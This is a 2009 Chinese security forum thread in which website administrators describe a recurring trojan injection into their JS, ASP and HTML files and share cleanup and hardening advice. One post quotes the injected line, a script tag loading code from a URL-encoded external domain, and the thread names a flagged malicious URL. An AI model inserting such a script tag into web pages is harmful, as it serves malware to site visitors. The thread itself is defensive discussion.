瑞星卡卡安全论坛

我们主机上的网站大多被挂马,点我们的网站都出现以提示:
访问地址：http://www.sl4llj.cn/a1/ss.htm
访问网页的进程：C:\Program Files\Internet Explorer\IEXPLORE.EXE
病毒名称：Suspicious.ShellCode.Exploit
请问怎么处理?是我们服务器的配置不完善吗?
紧急求救！！！！

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)

联系网站管理员去掉挂马。

应该不是服务器的配置不完善
应该是你的主机的网络安全做的不是很好
导致被黑客入侵并且挂了木马
相关的防御解决措施可以联系主机的安全维护人员
如果你是网站相关人员又不会解决的话
可以留言咨询:default9:

我们的服务器也遭了同样的木马病毒,把一些代码植入了数据文件的JS和ASP里,所以我们浏览网页就出现这个病毒提示.修改后，第2天又自动植入了，请问高手如何解决?QQ交流群6658539

先修复系统漏洞，然后检查代码，杀毒。

1、杀毒
尤其是检查所有动态网页 看是否有后门。。。根据文件创建日期和修改日期（建议不要用杀毒软件检测）
2、网站 加sql防入住代码
3、数据库更改密码 并把用户权限设置为public 如果数据小干脆换成access
4、检查“远程桌面连接”是否被打开  关掉
5、检查是否有带$的账号
6、关闭guest账号
7、开arp防火墙
8、检查同网段机器是否也中毒  确定是否被嗅探
暂时就能想到这么多了。。。。。。

我也是同样的情况，希望各位大侠帮助下  QQ：1119366500

你的网站被挂马?还是访问别的网站提示有木马？

网站被挂马了

网站被挂马

<script src=http://%63%63%6B%31%2E%63%6E></script>

1.这是个什么木马,服务器是怎么被感染的，如何驱除这个木马,并把自动植入的那些代码删除?
2.我的服务器数据文件里,我发现是JS\ASP\HTM\HTML 这四种类型的文件遭了.有一款软件<文本替换专家>可以清楚,不用开始,一个个文件的去查,再删除(累死人了),但隔几个小时后又会有.而且我准备将数据拷出来再把服务器硬盘格式化重装系统，却发现数据文件的权限全被删除了，根本无法拷贝出来，只有把文件权限更改后才可以，但是改了文件夹的权限,里面的文件权限还是没有，又必须把一个个文件的权限全部改后，才可以，昨天我花了1天时间才改完，才拷贝出来.希望大家有什么好的方法,其他人要警惕,一旦出现我这样的情况，可就遭了..
3.欢迎高手指导,和同类之人交流 QQ交流群6658539

继续
3.有人说是微软IE7漏洞造成的,难道是服务器的IE造成的?一般服务器可很少上网啊，我们都是远程管理.这个木马存于何处?如何才能干掉?

我从服务器上烤下来的数据,放在本地移动硬盘上，目前又没发现再自动植入代码了!难道该木马是存在于服务器硬盘上的?

是这个么？瑞星发布红色安全警报：IE7新漏洞致木马暴增
http://tech.qq.com/a/20090220/000244.htm

我的网站出现的问题跟楼主一模一样，请问怎么处理？
www.zhusiliao.com

大家赶快来参与啊!

如果你是管理员，仔细查找代码，去掉挂马。

楼上的，问题就在这里，把代码祛除了，第二天又有了,就如治病,没有找到病灶啊，只是治标。本在于找出该木马程序，然后删除

修复系统漏洞，去掉共享，断网杀毒。如还有异常，就去反病毒区扫描日志分析。

关键是用的虚拟主机，你说的这不可行啊。

那么多代码，不知道从何下手啊？该不会一个文件一个文件打开看吧？

我看了一些js文件，都没有发现什么异常的啊。

楼上的没看我前面发的文字吗?
即使把JS\ASP\HTML\HTM等文件里的那些恶意代码清除(文本替换专家等软件)了，过4-6个小时，或第二天上午又遭了,通过服务器日子发现，是凌晨入侵的,我发出来，大家参考一下.据报道是IE7.0\IE8.0漏洞造成的,可是我的服务器是IE6.0呢.怎么也遭了:日志部分如下:
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-02-23 06:16:57
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /index.asp - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/prototype.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/scriptaculous.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/util.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/effects.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/controls.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 219.153.64.8 GET /Index.asp - 80 - 219.153.64.8 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 64
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/dragdrop.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
2009-02-23 06:16:57 W3SVC1 127.0.0.1 GET /JS/checklogin.js - 80 - 127.0.0.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 200 0 0
等等很多的

都是80端口(网络默认端口)访问的,估计是远程木马访问造成的,关键是如何堵住这个漏洞
80端口又不能封,封了用户就访问不了网页了!

是否完全修复了系统漏洞？